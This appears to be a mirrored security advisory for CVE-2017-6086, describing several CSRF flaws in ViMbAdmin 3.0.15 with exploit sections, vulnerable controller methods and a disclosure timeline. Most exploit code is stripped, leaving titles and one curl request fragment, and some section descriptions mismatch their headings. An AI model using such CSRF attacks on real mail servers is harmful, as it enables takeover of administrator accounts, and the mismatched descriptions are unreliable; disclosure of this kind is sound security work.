# [CVE-2017-6086] Multiple CSRF vulnerabilities in ViMbAdmin version 3.0.15 ## Product Description ViMbAdmin is a web-based interface used to manage a mail server with virtual domains, mailboxes and aliases. It is an open source solution developed by Opensolutions and distributed under the GNU/GPL license version 3. The official web site can be found at http://www.vimbadmin.net and the source code of the application is available on github https://github.com/opensolutions. ## Details **CVE ID**: CVE-2017-6086 **Access Vector**: remote **Security Risk**: high **Vulnerability**: CWE-352 **CVSS Base Score**: 8.8 **CVSS vector**: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H ## Proof of concept ### Add administrator user #### Exploit The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. ```html CSRF ViMbAdmin
``` #### Vulnerable code The vulnerable code is located in the `addAction()` method of the `/application/controllers/DomainController.php` file. ### Remove administrator user #### Exploit The following html/javascript code allows to delete an administrator user. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. ```html CSRF ViMbAdmin
``` #### Vulnerable code The vulnerable code is located in the `purgeAction()` method of the `/application/controllers/DomainController.php` file. ### Change administrator password #### Exploit The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. ```html CSRF ViMbAdmin
``` #### Vulnerable code The vulnerable code is located in the `passwordAction()` method of the `/application/controllers/DomainController.php` file. ### Add mailbox address #### Exploit The following html/javascript code allows to update administrator password. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. ```html CSRF ViMbAdmin
``` #### Vulnerable code The vulnerable code is located in the `addAction()` method of the `/application/controllers/MailboxController.php` file. ### Purge mailbox #### Exploit The following html/javascript code allows to remove a mailbox address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. ```html CSRF ViMbAdmin
``` #### Vulnerable code The vulnerable code is located in the `purgeAction()` method of the `/application/controllers/MailboxController.php` file. ### Archive mailbox #### Exploit The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application. ```html CSRF ViMbAdmin
``` #### Vulnerable code The vulnerable code is located in the `addAction()` method of the `/application/controllers/ArchiveController.php` file. ### Add alias address #### Exploit The following html/javascript code allows to force the archival of a mailbox address. It needs to be visited by an administrator of the targeted ViMbAdmin application. ```html curl 'http:///alias/add/did/' --data 'local_part=&domain=&goto%5B%5D=' CSRF ViMbAdmin
``` #### Vulnerable code The vulnerable code is located in the `addAction()` method of the `/application/controllers/AliasController.php` file. ### Remove alias address #### Exploit The following html/javascript code allows the removal of a alias address. It needs to be visited by a logged administrator of the targeted ViMbAdmin application. ```html CSRF ViMbAdmin
``` #### Vulnerable Code The vulnerable code is located in the `addAction()` method of the `/application/controllers/AliasController.php` file. ## Affected version * tested on version 3.0.15 ## Timeline (dd/mm/yyyy) * 22/01/2017 : Initial discovery. * 16/02/2017 : First contact with opensolutions.io * 16/02/2017 : Advisory sent. * 24/02/2017 : Reply from the owner, acknowledging the report and planning to fix the vulnerabilities. * 13/03/2017 : Sysdream Labs request for an update. * 29/03/2017 : Second request for an update. * 29/03/2017 : Reply from the owner stating that he has no time to fix the issues. * 03/05/2017 : Full disclosure. ## Credits * Florian NIVETTE, Sysdream (f.nivette -at- sysdream -dot- com) # Iranian Exploit DataBase = http://IeDb.Ir [2017-05-12]